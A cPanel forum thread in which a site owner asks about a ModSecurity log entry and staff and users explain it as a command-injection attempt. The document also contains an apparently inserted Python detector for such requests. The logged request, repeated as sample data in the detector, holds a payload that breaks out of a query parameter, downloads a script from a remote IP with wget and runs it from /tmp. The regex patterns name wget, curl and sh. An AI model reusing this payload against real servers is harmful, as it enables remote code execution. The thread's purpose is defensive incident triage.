
Entry in Mod Security Log question

Discussion in 'Security' started by webstuff, Jun 25, 2018.

  1. webstuff

    webstuff Well-Known Member

    We recently found some scripts that look pretty nasty. Anybody have any idea what this person was trying to do?

    GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

    thanks
     
  2. sktest123

    sktest123 Well-Known Member

    Sort of command injection, via PHP CGI query string; it seems to be trying to download a remote shell script to tmp and execute it.
     
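    The request quoted above can be recognised mechanically once the query string is URL-decoded. The following is an added example (not code from the thread or from cPanel): it decodes the logged request line and flags the three parts of the pattern the reply describes, a shell metacharacter breaking out of the intended argument, a download of a remote file, and execution of something under /tmp. The sample lines are constructed for the example; the first is the entry from the thread, the second is a benign request for contrast.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines: the first is the entry quoted in the thread,
# the second is a benign request used for contrast.
SAMPLE_REQUESTS = [
    "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$",
    "GET /login.cgi?cli=bob&page=2",
]

# Indicators of the pattern discussed in the thread: a shell metacharacter that
# ends the intended argument, a remote download, and execution out of /tmp.
BREAKOUT = re.compile(r"[;|`]|\$\(|&&")
DOWNLOADER = re.compile(r"\b(wget|curl)\b.*https?://", re.IGNORECASE)
TMP_EXEC = re.compile(r"\b(sh|bash)\s+/tmp/", re.IGNORECASE)


def decode_query(request_line):
    """Return the URL-decoded query string of a 'METHOD /path?query' request line."""
    parts = request_line.split(" ", 1)
    target = parts[1] if len(parts) > 1 else parts[0]
    _, _, query = target.partition("?")
    # Decode twice so a double-encoded payload is inspected in its final form.
    return unquote(unquote(query))


def classify(request_line):
    """Return the list of indicator names found in the decoded query (empty if benign)."""
    q = decode_query(request_line)
    hits = []
    if BREAKOUT.search(q):
        hits.append("shell-breakout")
    if DOWNLOADER.search(q):
        hits.append("remote-download")
    if TMP_EXEC.search(q):
        hits.append("tmp-execution")
    return hits


def scan(lines):
    """Map each flagged request line to its indicators; benign lines are omitted."""
    return {line: classify(line) for line in lines if classify(line)}


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(", ".join(hits), "<-", line)
```

    Running the block over the two constructed lines flags only the first, with all three indicators; the same function can be pointed at the request field of a ModSecurity audit log to count how often the pattern recurs.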
  3. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Hello,

    The previous post includes an accurate description of what it looks like the attack was attempting to do. Let us know if you have additional questions.

    Thank you.
  4. webstuff

    webstuff Well-Known Member

    There was a security issue with a PHP file and tmp files were being deleted.

    I'm not sure if this helps any..

    Uptime: 123 seconds
    Executable:
    /usr/bin/php
    Command Line (often faked in exploits):
    /usr/bin/php
    Network connections by the process (if any):
    tcp: 127.0.0.1:33596 -> 127.0.0.1:3306
    tcp: 127.0.0.1:33598 -> 127.0.0.1:3306
    Files open by the process (if any):

    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error_log
    /tmp/.ZendSem.gYLBCK (deleted)
    /tmp/ZCUDi4colR (deleted)


    I have more of the log too. Any other ideas or suggestions on where to look ? I see they are trying to connect... They tried to connect 30 times today too.
     
  5. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Hello,

    Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists?

    Thank you.
  6. webstuff

    webstuff Well-Known Member

    Yes, I did remove the PHP hole, or at least I believe I did. So far I haven't seen any funky stuff, but I have seen this. The only other question I have with this is: do you think there is any chance they could have gotten my MySQL database login? In other words, when you see this sort of log, I assume you wouldn't need the MySQL username and password, correct? Or is there a possibility? Also, I can provide whatever else you would like. I do have some of the original files for some items. (The entire website was a complete mess. I had contacted my hosting provider, talked to the security team, and they kept telling me I had nothing to worry about, but I just didn't buy that, so this is sort of a learning experience for me too. After I started removing the stuff I stopped getting high server alerts, other alerts, etc.) But I do see connections like that in my mod security. Just want to be 110% sure I am not missing anything. Also, I did happen to find some advanced malware link, I believe, to where it installs a virus in the firm I believe. And if I understand everything correctly, it's one of those where if you wipe the drive and completely format it, it still stays on the system. Plus there were open folders, public keys, etc. I do not believe anything got changed, but then again, from my newbie side of details, I always could be missing something. There is other stuff that isn't going on which gives me the reason to believe I got it too. I will gladly PM any details too.

    Thank you again so much for the help.

    Thank you again.
     
  7. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Hello @webstuff,

    It's difficult to know for sure the extent at which the attacker was able to gain access to your website's files and passwords (assuming they were stored in a PHP configuration file). For additional investigation, it's generally a good idea to consult with a qualified system administrator. We provide a list of companies offering system administration services at:

    System Administration Services | cPanel Forums

    Additionally, we provide some more information about our Technical Support Department's ability to troubleshoot issues stemming from a hacked server at:

    Why can't I clean a hacked machine - cPanel Knowledge Base - cPanel Documentation

    Thank you.
  8. webstuff

    webstuff Well-Known Member

    Yes, I removed the files. In mod security it's showing they were trying to connect to 127.0.0.1. Can anyone point me in the right direction on this? It's showing blocked each time. Or any thoughts at all?
     
  9. webstuff

    webstuff Well-Known Member

    OK, just saw that, I looked into that. Haha, actually some top people were hired and they said they saw nothing and it was nothing to worry about. They thought it was email or some other files, which clearly wasn't correct. I am glad I kept investigating. I will keep you posted.
     